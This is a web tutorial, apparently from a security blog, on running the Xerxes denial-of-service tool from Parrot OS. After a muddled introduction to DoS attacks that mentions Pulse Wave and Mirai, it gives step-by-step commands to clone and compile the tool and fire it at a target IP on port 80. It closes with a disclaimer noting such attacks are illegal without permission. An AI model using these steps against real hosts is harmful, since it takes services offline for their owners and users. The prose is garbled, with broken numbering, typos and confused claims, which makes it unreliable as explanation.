What is a DOS attack?

Type of attack that floods servers or networks to prevent legitimate users from accessing the source. Recently the hackers introduced a new pattern of a DDOS attack called the Pulse Wave, able to pin down Multiple targets. As the classic DDoS attack, Pulse Wave doesn’t have an explosive time. Inviteflood-Tool used to conduct a DOS attack on VOIP Network. The Mirai bot used for targeting a college in the USA is continuously longer than 54 hours and the researchers believe it is a new variant of Mirai, “more suited for launching application layer assaults.”Xerxes– Parrot Os Tutorial To clone the Github tool. Let’s start to DDOS target ip

  1. Go to Terminal 2. git clone https://github.com/zanyarjamal/xerxes.git
  2. Now change the directory using ”CD xerxes” 4. Type “ls” 5. Then type “README” 6. Under the comment line [root@parrrot]-[`/Desktop/xerxes] type “$gcc xerxes.c –o xerxes” i.  If you don’t have ggc then you may download it from parrot website, then proceed with “apt-get install gcc;” ii. sudo apt install gcc make build-essential Now compile it by doing make xerxes
  3. Type “clear” to clean up all the comment 8. Now look for target ip address you wish to DDos by looking up the ip of host 9. Now type xerxes (ip 80) under the comment line [root@parrrot]-[`/Desktop/xerxes] For an example if your target ip is 188.183.188.188 then you need to type Xerxes “188.183.188.188 80 “to execute ddos.
  4. That’s it. Now the target ip receive over load with bulk traffic. Disclaimer: Please be aware that attacks using DDOS are illegal unless you have permission from the network owner and the parties involved. This post should be used as a tool to help the public understand how hackers use Xerxes ( although designed as a safety tool). The CybersGuards team shall not be held responsible if any criminal charges are brought against any person who misuses the information on this website to violate the law.

How to launch Xerxes DDos Tool to perform DOS Attack using Parrot Os   Cybers Guards - 61How to launch Xerxes DDos Tool to perform DOS Attack using Parrot Os   Cybers Guards - 22How to launch Xerxes DDos Tool to perform DOS Attack using Parrot Os   Cybers Guards - 27